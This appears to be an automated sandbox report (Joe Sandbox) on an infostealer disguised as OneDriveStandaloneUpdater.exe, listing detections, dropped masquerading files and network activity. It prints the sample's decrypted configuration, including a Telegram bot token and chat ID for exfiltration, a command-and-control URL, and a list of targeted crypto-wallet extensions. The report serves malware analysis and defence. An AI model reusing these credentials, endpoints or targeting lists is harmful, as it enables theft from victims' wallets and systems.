Source: C:\Program Files\Windows Mail\MjlsqDcSPlv.exe	ReversingLabs: Detection: 76%
Source: C:\Users\Public\Documents\csrss.exe	ReversingLabs: Detection: 76%
Source: C:\Users\Public\MjlsqDcSPlv.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\APmXeiLI.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\AVoOdXhS.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\BSPWzXwN.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\GKdPiyNu.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\GVFPWxSW.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HsjPOZbA.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\IzKxwscH.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\JDsxUuzs.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LAjmiABv.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\LpAoDpdA.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\OnkfajLl.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\QEZfGaYD.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\SrUDuXuD.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\WmaEvGYQ.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\WoNdSLwd.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XVEvJLRT.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\caoTeAzl.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\fxnuLaBD.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hJaCsdsL.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hyzrKdBs.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\lJHjOcES.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\lYJBZlMp.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ntqjPtDe.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ocVadywh.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\pbHguWQZ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pniscWHs.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pzyaVZFL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\tYWrkemb.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\vcUYBlwU.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\vqLrRVyt.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\wnmzmVNo.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\xJPzewWS.log	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: OneDriveStandaloneUpdater.exe	Virustotal: Detection: 63%			Perma Link
Source: OneDriveStandaloneUpdater.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Documents\csrss.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OneDriveStandaloneUpdater.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: OneDriveStandaloneUpdater.exe	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"TelegramNotifer":{"chatid":"6615417766","bottoken":"7593103872:AAEGSOdQBzT2S-BhBNZaciqHI0Pbg2O3PeA","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"False","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
Source: OneDriveStandaloneUpdater.exe	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-RZ2CPLiApiJRJuXbfSyz","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
Source: OneDriveStandaloneUpdater.exe	String decryptor: [["http://574565cm.renyash.top/","LongpollserverFlowerasyncCdn"]]

Source: OneDriveStandaloneUpdater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ef091392c4842d	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Windows Mail\MjlsqDcSPlv.exe	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Windows Mail\ef091392c4842d	Jump to behavior

Source: OneDriveStandaloneUpdater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini.pdb source: csrss.exe, 00000043.00000002.1980050735.00000000010AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.pdb source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.iniem.pdb source: csrss.exe, 00000033.00000002.1851417029.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.pdb source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.inim.pdb source: csrss.exe, 00000029.00000002.1717735778.00000000010AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: MjlsqDcSPlv.exe, 0000003F.00000002.2662319769.000000001B330000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb0 source: OneDriveStandaloneUpdater.exe, 00000038.00000002.2634469219.000000001ADF0000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: unknown

DNS traffic detected: query: 574565cm.renyash.top replaycode: Server failure (2)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 574565cm.renyash.top

Source: csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://574565cm.renyash.top
Source: csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://574565cm.renyash.top/
Source: csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://574565cm.renyash.top/LongpollserverFlowerasyncCdn.php
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1312941189.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: powershell.exe, 0000000D.00000002.2612884415.0000016136767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588818715.000001CAB8ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2706402857.000001F1B1DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2781554792.000001EDB2CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2647889757.0000024BE1EC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1452930808.0000016126919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA9088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD2077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1328499535.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1452930808.00000161266F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA8E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD1E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE63A1000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002763000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002678000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.000000000321A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1452930808.0000016126919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA9088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD2077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1452930808.00000161266F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1445400523.000001CAA8E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1445287569.000001F1A1D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1448436376.000001EDA2C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1445458856.0000024BD1E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1443825625.0000016FE63A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.1443825625.0000016FE65C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	String found in binary or memory: https://ipinfo.io/country
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002931000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000020.00000002.1467210557.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1731249634.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.0000000002791000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1835623417.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.1879333432.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp, OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.0000000003500000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.2011549041.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, EERPqGGD.log.41.dr, sjwHPvrg.log.32.dr	String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 0000000D.00000002.2612884415.0000016136767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588818715.000001CAB8ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2706402857.000001F1B1DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2781554792.000001EDB2CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2647889757.0000024BE1EC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2537495430.0000016FF6417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC461222	0_2_00007FFAAC461222
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC468E70	0_2_00007FFAAC468E70
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC46C350	0_2_00007FFAAC46C350
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC468028	0_2_00007FFAAC468028
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC46C425	0_2_00007FFAAC46C425
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC4748EE	0_2_00007FFAAC4748EE
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC468E7F	0_2_00007FFAAC468E7F
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 0_2_00007FFAAC5DCA69	0_2_00007FFAAC5DCA69
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC46C350	32_2_00007FFAAC46C350
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC46C425	32_2_00007FFAAC46C425
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC461222	32_2_00007FFAAC461222
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC468028	32_2_00007FFAAC468028
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC468E7F	32_2_00007FFAAC468E7F
Source: C:\Users\Public\Documents\csrss.exe	Code function: 32_2_00007FFAAC5DC27D	32_2_00007FFAAC5DC27D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 38_2_00007FFAAC461222	38_2_00007FFAAC461222
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 40_2_00007FFAAC471222	40_2_00007FFAAC471222
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC46C350	41_2_00007FFAAC46C350
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC46C425	41_2_00007FFAAC46C425
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC461222	41_2_00007FFAAC461222
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC468028	41_2_00007FFAAC468028
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC468E7F	41_2_00007FFAAC468E7F
Source: C:\Users\Public\Documents\csrss.exe	Code function: 41_2_00007FFAAC5DC27D	41_2_00007FFAAC5DC27D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC481222	46_2_00007FFAAC481222
